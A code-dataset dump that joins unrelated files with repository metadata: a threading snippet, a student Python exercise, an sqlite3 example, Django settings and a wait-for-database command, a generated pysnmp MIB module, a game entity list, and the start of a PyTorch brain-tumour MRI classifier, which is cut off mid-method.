        name = "Thread-" + str(counter)
        threads.append(threading.Thread(target=get_data, args=(name, mysql_obj,)))
        counter += 1
    # threads.append(thing5)
    # Start all workers.
    for thing in threads:
        # Daemon threads die with the main thread instead of keeping the
        # process alive on their own.
        thing.setDaemon(True)
        thing.start()
    # Block until every worker has drained the queue.
    for thing in threads:
        thing.join()
"gedong009@qq.com"
] | gedong009@qq.com |
6b98012278b2ef3e02f3bdbc33e146865eb26807 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/201/46743/submittedfiles/testes.py | 3378d84c86f02731a2be48d3b0f834f8d9cb8366 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
# Read a radius and print the circle's area (pi * r**2).
r = float(input('Digite um raio:'))
pi = 3.14  # was `3,14` -- the comma built a tuple, and tuple * float raises TypeError
a = pi * (r ** 2)  # the original line ended in a stray ':' (SyntaxError)
print(a)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62478de103e5b4226fe148f74b655fb80192b169 | e2919a492ffb1762534739f81a4f78fdb4dcb17f | /sql/primer_1.py | ce6b39fadae4796caf7c6b1d3ac7133944521daf | [] | no_license | AndreyDacenko/traning | 4ab94ead5a64245ca775cc03967598427f680d0f | f6c594ef888c42e9d6f16bfd4ac004e1ac00b139 | refs/heads/master | 2021-12-10T23:40:05.883178 | 2021-08-11T16:52:27 | 2021-08-11T16:52:27 | 202,687,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | import sqlite3
# First, open a connection to our database.
# In this example the DB is a file on the local machine; it could just as
# well live on a server.  (Never commit a real database file to the repo!)
conn = sqlite3.connect('Northwind.sl3')
# Return raw bytes from text columns instead of decoded str objects.
conn.text_factory = bytes
try:
    # A cursor is the object used to issue SQL statements against the DB.
    cursor = conn.cursor()
    # Selecting rows:
    #   SELECT <field-list> FROM <table>[ WHERE <condition>]
    # Example: orders whose Freight (shipping charge) exceeds 100 and whose
    # delivery region (ShipRegion) is 'RJ'.
    cursor.execute("SELECT * FROM Orders WHERE (Freight > 100) AND (ShipRegion = 'RJ')")
    # Fetch every matching row.
    results = cursor.fetchall()
    # Plain loop instead of a side-effect list comprehension.
    for row in results:
        print(row)
finally:
    # The original script leaked the connection; always release it.
    conn.close()
"andrey_dacenko@mail.ru"
] | andrey_dacenko@mail.ru |
4e00a1dbf4061dd58654ba69bca13d9e6499f794 | c10e2a73d15bbbeeda9ceb5321fc423b0b2ec98c | /mysite/settings.py | 07fc9230f56c09403d471ae021b61cfb295d20df | [
"MIT"
] | permissive | bennett39/pulitzers | 9822c5628901ea80d90fdb162148d5bdf0dc509a | 73b932275fe61af204c6a681f43778317c97c0fb | refs/heads/master | 2023-06-09T00:59:16.035391 | 2023-05-24T21:36:15 | 2023-05-24T21:36:15 | 188,304,164 | 0 | 0 | MIT | 2023-01-03T23:30:45 | 2019-05-23T20:46:29 | CSS | UTF-8 | Python | false | false | 3,629 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import django_heroku
import dj_database_url
import dotenv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load environment variables from a local .env file when one exists
# (development convenience; Heroku supplies env vars directly).
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
    dotenv.load_dotenv(dotenv_file)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
# NOTE(review): DEBUG is hard-coded True here -- confirm it is overridden
# (or this file swapped) for production deploys.
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'api.apps.ApiConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'corsheaders',
]
# CorsMiddleware must sit above CommonMiddleware; WhiteNoise serves static
# files directly from the app dyno.
MIDDLEWARE = [
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
# NOTE(review): allows cross-origin requests from any origin -- fine for a
# public read-only API, otherwise restrict with CORS_ORIGIN_WHITELIST.
CORS_ORIGIN_ALLOW_ALL = True
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Connection details come from the DATABASE_URL env var via dj-database-url.
DATABASES = {}
DATABASES['default'] = dj_database_url.config(conn_max_age=600)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'assets/build'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# Apply Heroku-specific overrides (db, static, logging) on top of the above.
django_heroku.settings(locals())
# django_heroku forces sslmode on the DB connection; it is stripped here,
# presumably so a local Postgres without SSL works -- confirm before
# changing, and note this raises KeyError if OPTIONS/sslmode is absent.
del DATABASES['default']['OPTIONS']['sslmode']
| [
"34491412+bennett39@users.noreply.github.com"
] | 34491412+bennett39@users.noreply.github.com |
21a65c73620f2a40477d64a11550fc36704d99f4 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/A3COM-HUAWEI-RS485-MIB.py | 6e4c22f4a88026cd33571d0023c92ae07bce922d | [
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 10,571 | py | #
# PySNMP MIB module A3COM-HUAWEI-RS485-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/A3COM-HUAWEI-RS485-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 16:52:12 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
h3cCommon, = mibBuilder.importSymbols("A3COM-HUAWEI-OID-MIB", "h3cCommon")
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter64, Counter32, iso, IpAddress, MibIdentifier, ObjectIdentity, TimeTicks, Integer32, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, NotificationType, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "iso", "IpAddress", "MibIdentifier", "ObjectIdentity", "TimeTicks", "Integer32", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "NotificationType", "Bits", "Gauge32")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
h3cRS485 = ModuleIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109))
if mibBuilder.loadTexts: h3cRS485.setLastUpdated('200910210000Z')
if mibBuilder.loadTexts: h3cRS485.setOrganization('Hangzhou H3C Technologies Co., Ltd.')
h3cRS485Properties = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1))
h3cRS485PropertiesTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1), )
if mibBuilder.loadTexts: h3cRS485PropertiesTable.setStatus('current')
h3cRS485PropertiesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cRS485PropertiesEntry.setStatus('current')
h3cRS485RawSessionNextIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionNextIndex.setStatus('current')
h3cRS485BaudRate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("bautRate300", 1), ("bautRate600", 2), ("bautRate1200", 3), ("bautRate2400", 4), ("bautRate4800", 5), ("bautRate9600", 6), ("bautRate19200", 7), ("bautRate38400", 8), ("bautRate57600", 9), ("bautRate115200", 10))).clone('bautRate9600')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485BaudRate.setStatus('current')
h3cRS485DataBits = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("five", 1), ("six", 2), ("seven", 3), ("eight", 4))).clone('eight')).setUnits('bit').setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485DataBits.setStatus('current')
h3cRS485Parity = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("none", 1), ("odd", 2), ("even", 3), ("mark", 4), ("space", 5))).clone('none')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485Parity.setStatus('current')
h3cRS485StopBits = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("one", 1), ("two", 2), ("oneAndHalf", 3))).clone('one')).setUnits('bit').setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485StopBits.setStatus('current')
h3cRS485FlowControl = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("none", 1), ("hardware", 2), ("xonOrxoff", 3))).clone('none')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485FlowControl.setStatus('current')
h3cRS485TXCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485TXCharacters.setStatus('current')
h3cRS485RXCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RXCharacters.setStatus('current')
h3cRS485TXErrCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485TXErrCharacters.setStatus('current')
h3cRS485RXErrCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RXErrCharacters.setStatus('current')
h3cRS485ResetCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("counting", 1), ("clear", 2))).clone('counting')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485ResetCharacters.setStatus('current')
h3cRS485RawSessions = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2))
h3cRS485RawSessionSummary = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 1))
h3cRS485RawSessionMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionMaxNum.setStatus('current')
h3cRS485RawSessionTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2), )
if mibBuilder.loadTexts: h3cRS485RawSessionTable.setStatus('current')
h3cRS485RawSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "A3COM-HUAWEI-RS485-MIB", "h3cRS485SessionIndex"))
if mibBuilder.loadTexts: h3cRS485RawSessionEntry.setStatus('current')
h3cRS485SessionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: h3cRS485SessionIndex.setStatus('current')
h3cRS485SessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("udp", 1), ("tcpClient", 2), ("tcpServer", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485SessionType.setStatus('current')
h3cRS485SessionAddType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 3), InetAddressType().clone('ipv4')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485SessionAddType.setStatus('current')
h3cRS485SessionRemoteIP = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 4), InetAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionRemoteIP.setStatus('current')
h3cRS485SessionRemotePort = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1024, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionRemotePort.setStatus('current')
h3cRS485SessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1024, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionLocalPort.setStatus('current')
h3cRS485SessionStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionStatus.setStatus('current')
h3cRS485RawSessionErrInfoTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3), )
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfoTable.setStatus('current')
h3cRS485RawSessionErrInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "A3COM-HUAWEI-RS485-MIB", "h3cRS485SessionIndex"))
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfoEntry.setStatus('current')
h3cRS485RawSessionErrInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfo.setStatus('current')
mibBuilder.exportSymbols("A3COM-HUAWEI-RS485-MIB", h3cRS485RawSessionMaxNum=h3cRS485RawSessionMaxNum, h3cRS485StopBits=h3cRS485StopBits, h3cRS485SessionRemotePort=h3cRS485SessionRemotePort, h3cRS485RawSessionErrInfoEntry=h3cRS485RawSessionErrInfoEntry, h3cRS485TXErrCharacters=h3cRS485TXErrCharacters, h3cRS485=h3cRS485, h3cRS485RXCharacters=h3cRS485RXCharacters, h3cRS485PropertiesEntry=h3cRS485PropertiesEntry, h3cRS485SessionAddType=h3cRS485SessionAddType, h3cRS485FlowControl=h3cRS485FlowControl, h3cRS485Properties=h3cRS485Properties, h3cRS485PropertiesTable=h3cRS485PropertiesTable, h3cRS485ResetCharacters=h3cRS485ResetCharacters, PYSNMP_MODULE_ID=h3cRS485, h3cRS485RawSessionEntry=h3cRS485RawSessionEntry, h3cRS485RawSessionNextIndex=h3cRS485RawSessionNextIndex, h3cRS485RawSessionTable=h3cRS485RawSessionTable, h3cRS485RawSessionErrInfo=h3cRS485RawSessionErrInfo, h3cRS485TXCharacters=h3cRS485TXCharacters, h3cRS485SessionStatus=h3cRS485SessionStatus, h3cRS485RawSessions=h3cRS485RawSessions, h3cRS485SessionRemoteIP=h3cRS485SessionRemoteIP, h3cRS485SessionLocalPort=h3cRS485SessionLocalPort, h3cRS485SessionIndex=h3cRS485SessionIndex, h3cRS485RXErrCharacters=h3cRS485RXErrCharacters, h3cRS485RawSessionSummary=h3cRS485RawSessionSummary, h3cRS485BaudRate=h3cRS485BaudRate, h3cRS485DataBits=h3cRS485DataBits, h3cRS485SessionType=h3cRS485SessionType, h3cRS485RawSessionErrInfoTable=h3cRS485RawSessionErrInfoTable, h3cRS485Parity=h3cRS485Parity)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
eee6c26c594ab5b9fa6e26288db0e7e9dee3d498 | ff886f5f947460576feaec2a049f6a9f78f2a63f | /core/management/commands/wait_for_db.py | 460989d579a419bc219cba5e76cc9fcb204aa701 | [
"MIT"
] | permissive | devendraprasad1984/loan_payment_app | 2bc927afbc084504bb10a959105d72f6f419e2c8 | 1a4c31d03a8c5ecf4dae2a981373649f4f699aa3 | refs/heads/main | 2023-07-21T19:00:40.692978 | 2021-09-09T03:36:04 | 2021-09-09T03:36:04 | 400,111,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | import time
from django.db import connections
from django.db.utils import OperationalError
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    """Django management command that blocks until the database accepts
    connections (used so app containers don't start before the DB is up)."""
    def handle(self, *args, **options):
        """Retry once per second until a real connection can be opened."""
        self.stdout.write('waiting for db connection...')
        db_conn = None
        while not db_conn:
            try:
                # ensure_connection() actually opens a connection; merely
                # indexing connections['default'] (as the original did)
                # returns a lazy wrapper and never raises, so a down
                # database was never detected.
                connections['default'].ensure_connection()
                db_conn = connections['default']
            except OperationalError:
                self.stdout.write(self.style.ERROR('database is not available, re-checking in 1sec'))
                time.sleep(1)
        self.stdout.write(self.style.SUCCESS('database is available'))
| [
"devendraprasad1984@gmail.com"
] | devendraprasad1984@gmail.com |
8ff182862ff5c1544e49022bd0b028e0b7fd99a2 | 2d8517cb6ce3f1eefaffc5bf3acab58eb0331e38 | /tools/inputs/animals.py | 0075001481b1099da0808854933c89e7f7ba0236 | [] | no_license | ryyst/conjurer | e4ce6e270b11d481ff99f78dad472a4cb5738bb7 | 4db5aa7e4daa87b3b26a6d232a33b950de299a55 | refs/heads/master | 2023-07-10T02:47:22.282657 | 2021-08-08T21:07:48 | 2021-08-08T21:07:48 | 313,402,786 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | # Most animals already have their own icon that the game provides,
# so this is only for the "unofficial" enemies.
# Each entry is a dict with a single "path" key pointing at the entity's
# XML definition inside the game's data tree.
CUSTOM_ANIMALS = [
    {"path": "entities/buildings/lasergun.xml"},
    {"path": "entities/buildings/lukki_eggs.xml"},
    {"path": "entities/buildings/spidernest.xml"},
    {"path": "entities/buildings/firebugnest.xml"},
    {"path": "entities/buildings/flynest.xml"},
    {"path": "entities/buildings/physics_cocoon.xml"},
    #
    # These are mixed together a bit. See animals.lua for details
    {"path": "entities/animals/darkghost.xml"},
    {"path": "entities/animals/ghost.xml"},
    {"path": "entities/buildings/darkghost_crystal.xml"},
    {"path": "entities/buildings/ghost_crystal.xml"},
    #
]
| [
"rpuolak@gmail.com"
] | rpuolak@gmail.com |
c36e9f213f21c497cd2a8eb0ebdb30eb59bba41e | 3f82466567c664a14c18ea03df2ddcb30678175e | /brain_Tumor.py | 6558b103566c0e171c8d8f0b099ed52884707747 | [
"MIT"
] | permissive | Sumanyu123/An-Efficient-Brain-Tumor-MRI-classification-using-Deep-Residual-Learning | ec295d75fca6199fa152ad556fd0d25054dba8a6 | 2176806f39e4a1054461fa55b7a399345acca5e8 | refs/heads/main | 2023-08-24T19:30:59.522101 | 2021-09-21T19:07:20 | 2021-09-21T19:07:20 | 409,250,074 | 1 | 0 | MIT | 2021-09-22T15:05:53 | 2021-09-22T15:05:52 | null | UTF-8 | Python | false | false | 17,418 | py | from __future__ import annotations
__doc__: str = r'''
>>> Paper Title:
An Efficient Brain Tumor Classification using Deep Residual Learning.
>>> Paper Abstract:
Brain tumor categorization is essential for evaluating tumors as well as determining treatment
choices established on their classifications. To identify brain tumors, a variety of imaging
methods are employed. Oppositely, MRI is widely utilized because of its improved image quality
and the fact of matter is that it does not employ ionizing radiation. Deep learning is a subset
of machine learning that lately has demonstrated exceptional performance, particularly in
classification and segmentation. In this study, we used a deep residual network to classify
distinct kinds of tumors which are present in brain using images datasets. The MRI scans create
a massive quantity of data. The radiologist examines these scans. Meningioma, glioma and pituitary
tumor are the three main categories of tumors which are present in brain. Because of the intricacies
involved in brain tumors, a manual examination might be an error prone. Automated classification
machine learning-based approaches have consistently outperformed manual categorization. As a result,
we propose a system that performs detection as well as classification using deep residual networks
based on CNN and other different models such as ResNet, AlexNet, Inception, VGG16.
'''
import warnings, os, copy, time
from tqdm import tqdm
warnings.filterwarnings('ignore')
from typing import ClassVar, Optional
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from torchvision import transforms, utils
#@: Custom Dataset Class
class TumorDataset(torch.utils.data.Dataset):
    """MRI dataset: indexes every image under <path>/<sub_path>/<category>
    and serves (image, label) pairs; labels 0..3 follow the order of
    *categories* (glioma, meningioma, no tumor, pituitary)."""
    def __init__(self, path: 'dir_path', sub_path: str,
                       categories: list[str],
                       transform: 'torchvision.transforms') -> None:
        self.path = path
        self.sub_path = sub_path
        self.categories = categories
        self.transform = transform
        # Eagerly build the (path, label) index once at construction time.
        self.dataset = self.get_data()
    def get_data(self) -> pd.DataFrame:
        """Walk each category folder and return a shuffled DataFrame with
        columns ``path`` (absolute image path) and ``label`` (category index).

        The four copy-pasted per-category stanzas of the original are
        collapsed into one loop; that also removes the NameError in the
        no-tumor stanza, which joined against the undefined name ``no``
        instead of ``no_path``.
        """
        all_imgPaths: list[str] = []
        all_labels: list[int] = []
        for label, category in enumerate(self.categories):
            category_dir = os.path.join(self.path, self.sub_path, category)
            for file_name in os.listdir(category_dir):
                all_imgPaths.append(os.path.abspath(os.path.join(category_dir, file_name)))
                all_labels.append(label)
        dataframe = pd.DataFrame.from_dict({'path': all_imgPaths, 'label': all_labels})
        # Shuffle once so consecutive samples are not all from one class.
        dataframe = dataframe.sample(frac=1)
        return dataframe
    def __len__(self) -> int:
        return len(self.dataset)
    def __getitem__(self, index: int) -> tuple[torch.Tensor, int]:
        """Load sample *index* as an RGB image, apply the transform (if any)
        and return it with its integer label."""
        # Load unconditionally: the original only loaded inside the
        # `transform is not None` branch, leaving `image` unbound
        # (UnboundLocalError) whenever no transform was supplied.
        image = Image.open(self.dataset.iloc[index].path).convert('RGB')
        if self.transform is not None:
            image = self.transform(image)
        label = self.dataset.iloc[index].label
        return image, label
#@: Data Analysis Class
class TumorAnalysis:
    """Quick visual sanity checks over a TumorDataset and its DataLoader."""
    # Maps the integer class label back to a human-readable tumor name.
    label_map: ClassVar[dict[int, str]] = {
        0: 'Glioma Tumor',
        1: 'Meningioma Tumor',
        2: 'No Tumor',
        3: 'Pituitary Tumor'
    }
    def __init__(self, data: object, loader: object) -> None:
        # data: a TumorDataset; loader: the matching DataLoader.
        # Only `data` is read here -- the loader is kept for callers.
        self.data = data
        self.loader = loader
    def batchImg_display(self) -> 'plot':
        """Show a 3x3 grid of randomly sampled images titled with their class."""
        figure = plt.figure(figsize= (8, 8))
        cols, rows = 3, 3
        for i in range(1, cols * rows + 1):
            # Draw a fresh random sample index for every grid cell.
            sample_index = torch.randint(len(self.data), size= (1,)).item()
            image, label = self.data[sample_index]
            figure.add_subplot(rows, cols, i)
            plt.title(self.label_map[int(label)])
            # Tensor -> PIL -> ndarray so imshow receives HxWxC RGB data.
            plt.imshow(np.asarray(transforms.ToPILImage()(image).convert('RGB')))
        plt.show()
class Utils:
    """Namespace for the convolution factory helpers used by the residual
    blocks (mirrors torchvision's resnet `conv3x3`/`conv1x1`)."""
    # These were instance methods, yet every call site invokes them as
    # Utils.conv3x3(a, b, c) -- silently binding the first argument to
    # `self` and shifting the rest. @staticmethod makes those calls correct.
    @staticmethod
    def conv3x3(in_planes: int, out_planes: int, stride: Optional[int] = 1) -> nn.Conv2d:
        """3x3 convolution, padding 1, no bias (BN follows it)."""
        return nn.Conv2d(
            in_planes,
            out_planes,
            kernel_size=3,
            stride=stride,
            padding=1,
            bias=False
        )
    @staticmethod
    def conv1x1(in_planes: int, out_planes: int, stride: Optional[int] = 1) -> nn.Conv2d:
        """1x1 convolution (downsampling shortcuts), no bias."""
        return nn.Conv2d(
            in_planes,
            out_planes,
            kernel_size=1,
            stride=stride,
            bias=False
        )
class BasicBlock(nn.Module):
    """Two-convolution residual block (the building block of ResNet-18/34).

    The skip connection adds the (optionally downsampled) input back onto
    the output of the second batch-norm before the final ReLU.
    """
    expansion: ClassVar[int] = 1  # output channels == planes * expansion
    def __init__(self, inplanes: int, planes: int,
                       stride: Optional[int] = 1,
                       downsample: Optional[bool] = None) -> None:
        super(BasicBlock, self).__init__()
        # Main path: conv -> BN -> ReLU -> conv -> BN.
        self.conv1 = Utils.conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = Utils.conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        # Optional module that reshapes the identity branch to match.
        self.downsample = downsample
        self.stride = stride
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Compute F(x) + shortcut(x), then apply the final ReLU."""
        shortcut = x if self.downsample is None else self.downsample(x)
